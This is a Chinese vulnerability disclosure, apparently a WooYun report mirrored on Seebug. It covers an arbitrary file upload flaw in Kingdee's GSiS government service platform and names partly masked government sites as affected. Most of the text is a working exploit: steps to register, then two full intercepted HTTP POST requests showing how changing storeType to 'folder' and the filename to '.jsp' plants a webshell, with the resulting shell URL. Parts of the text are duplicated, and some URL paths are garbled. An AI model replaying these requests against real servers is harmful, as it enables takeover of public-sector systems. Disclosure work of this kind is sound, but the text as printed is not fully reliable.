### 简要描述: GSiS政务服务平台:首个完全根据国家政策要求全新开发的,支撑政务服务体系和行政权力监督体系融合运转的一体化平台。 测试中发现存在任意文件上传漏洞,可获取webshell ### 详细说明: 问题:上传页面多数参数可控,导致任意文件上传,且有越权访问会员外功能问题。 收集到的案例有: 高平市政务中心 http://gk.sx******.gov.cn:8080/kdgs/ 汉川政务中心 http://www.han****.gov.cn:8080/kdgs 等等 通杀所有金蝶GSIS ### 漏洞证明: 本次演示地址为: http://gk.sx******.gov.cn:8080/kdgs 漏洞地址:http://gk.sx******.gov.cn:8080/kdgs/portal/sharehttps://images.seebug.org/upload/uploadFile.jsp 第一步: 注册并登录网站会员获取合法会话标识 注册地址 http://gk.sx******.gov.cn:8080/kdgs/biz/portal/user/regist.action?registUserType= 如果页面找不到注册按钮的可以直接替换页面找到注册地址。 第二步: 访问文件上传页面,利用burpsuite代理进行上传 正常上传POST请求为 ``` POST /kdgs/biz/portalhttps://images.seebug.org/upload/upload.action HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Referer:...
### 简要描述: GSiS政务服务平台:首个完全根据国家政策要求全新开发的,支撑政务服务体系和行政权力监督体系融合运转的一体化平台。 测试中发现存在任意文件上传漏洞,可获取webshell ### 详细说明: 问题:上传页面多数参数可控,导致任意文件上传,且有越权访问会员外功能问题。 收集到的案例有: 高平市政务中心 http://gk.sx******.gov.cn:8080/kdgs/ 汉川政务中心 http://www.han****.gov.cn:8080/kdgs 等等 通杀所有金蝶GSIS ### 漏洞证明: 本次演示地址为: http://gk.sx******.gov.cn:8080/kdgs 漏洞地址:http://gk.sx******.gov.cn:8080/kdgs/portal/sharehttps://images.seebug.org/upload/uploadFile.jsp 第一步: 注册并登录网站会员获取合法会话标识 注册地址 http://gk.sx******.gov.cn:8080/kdgs/biz/portal/user/regist.action?registUserType= 如果页面找不到注册按钮的可以直接替换页面找到注册地址。 第二步: 访问文件上传页面,利用burpsuite代理进行上传 正常上传POST请求为 ``` POST /kdgs/biz/portalhttps://images.seebug.org/upload/upload.action HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Referer: http://gk.sx******.gov.cn:8080/kdgs/portal/sharehttps://images.seebug.org/upload/uploadFile.jsp?path=ITEM_PATH&maximumSize=3145728&fileSaveMode=00&storeType=db&refreshTimestamp=1405994496640 Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Content-Type: multipart/form-data; boundary=---------------------------7def0302c2 Accept-Encoding: gzip, deflate Host: gk.sx******.gov.cn:8080 Content-Length: 1502 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: JSESSIONID=B247935EBA2FB9FE9B4C4506A4646D45; __userType__cookie=INNER -----------------------------7def0302c2 Content-Disposition: form-data; name="id" -----------------------------7def0302c2 Content-Disposition: form-data; name="viewid" -----------------------------7def0302c2 Content-Disposition: form-data; name="path" ITEM_PATH -----------------------------7def0302c2 Content-Disposition: form-data; name="fileSaveMode" 00 -----------------------------7def0302c2 Content-Disposition: form-data; name="uploadList_" -----------------------------7def0302c2 Content-Disposition: form-data; name="fieldValue" -----------------------------7def0302c2 Content-Disposition: form-data; name="allowedTypes" -----------------------------7def0302c2 Content-Disposition: form-data; name="maximumSize" 3145728 -----------------------------7def0302c2 Content-Disposition: form-data; name="storeType" db -----------------------------7def0302c2 Content-Disposition: form-data; name="fieldid" -----------------------------7def0302c2 Content-Disposition: form-data; name="file"; filename="3.gif" Content-Type: image/gif wooyun -----------------------------7def0302c2 Content-Disposition: form-data; name="filename" C:\fakepath\3.gif -----------------------------7def0302c2 Content-Disposition: form-data; name="file"; filename="" Content-Type: application/octet-stream -----------------------------7def0302c2 Content-Disposition: form-data; name="filename" -----------------------------7def0302c2-- ``` 修改storeType的值db为folder 修改filename的值为XX.jsp [<img src="https://images.seebug.org/upload/201407/22140035beec481016818ab1e639d16428a9a06d.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/22140035beec481016818ab1e639d16428a9a06d.png) 修改后的POST数据包为 ``` POST /kdgs/biz/portalhttps://images.seebug.org/upload/upload.action HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Referer: http://gk.sx******.gov.cn:8080/kdgs/portal/sharehttps://images.seebug.org/upload/uploadFile.jsp?path=ITEM_PATH&maximumSize=3145728&fileSaveMode=00&storeType=db&refreshTimestamp=1405994496640 Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Content-Type: multipart/form-data; boundary=---------------------------7def0302c2 Accept-Encoding: gzip, deflate Host: gk.sx******.gov.cn:8080 Content-Length: 1502 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: JSESSIONID=B247935EBA2FB9FE9B4C4506A4646D45; __userType__cookie=INNER -----------------------------7def0302c2 Content-Disposition: form-data; name="id" -----------------------------7def0302c2 Content-Disposition: form-data; name="viewid" -----------------------------7def0302c2 Content-Disposition: form-data; name="path" ITEM_PATH -----------------------------7def0302c2 Content-Disposition: form-data; name="fileSaveMode" 00 -----------------------------7def0302c2 Content-Disposition: form-data; name="uploadList_" -----------------------------7def0302c2 Content-Disposition: form-data; name="fieldValue" -----------------------------7def0302c2 Content-Disposition: form-data; name="allowedTypes" -----------------------------7def0302c2 Content-Disposition: form-data; name="maximumSize" 3145728 -----------------------------7def0302c2 Content-Disposition: form-data; name="storeType" folder -----------------------------7def0302c2 Content-Disposition: form-data; name="fieldid" -----------------------------7def0302c2 Content-Disposition: form-data; name="file"; filename="3.gif" Content-Type: image/gif wooyun -----------------------------7def0302c2 Content-Disposition: form-data; name="filename" C:\fakepath\3.jsp -----------------------------7def0302c2 Content-Disposition: form-data; name="file"; filename="" Content-Type: application/octet-stream -----------------------------7def0302c2 Content-Disposition: form-data; name="filename" -----------------------------7def0302c2-- ``` 上传成功后得到 [<img src="https://images.seebug.org/upload/201407/29122606fa695654021ef605bd04434ee768bfd2.png" alt="2214090909734adf55858a24ca2745e921f09f4c.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/29122606fa695654021ef605bd04434ee768bfd2.png) webshell地址为 http://gk.sx******.gov.cn:8080/kdgs/uploads/item/11e4-1165-d78d7b5a-ba69-331a1d69f888.jsp 11e4-1165-d78d7b5a-ba69-331a1d69f888.jsp是随机的,看burpsuite回显。 [<img src="https://images.seebug.org/upload/201407/29122621bd3b91cd6c26761478babf746f817ed7.png" alt="22141009dd5c045a79425a4decd5bb2b0eeedd89.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/29122621bd3b91cd6c26761478babf746f817ed7.png)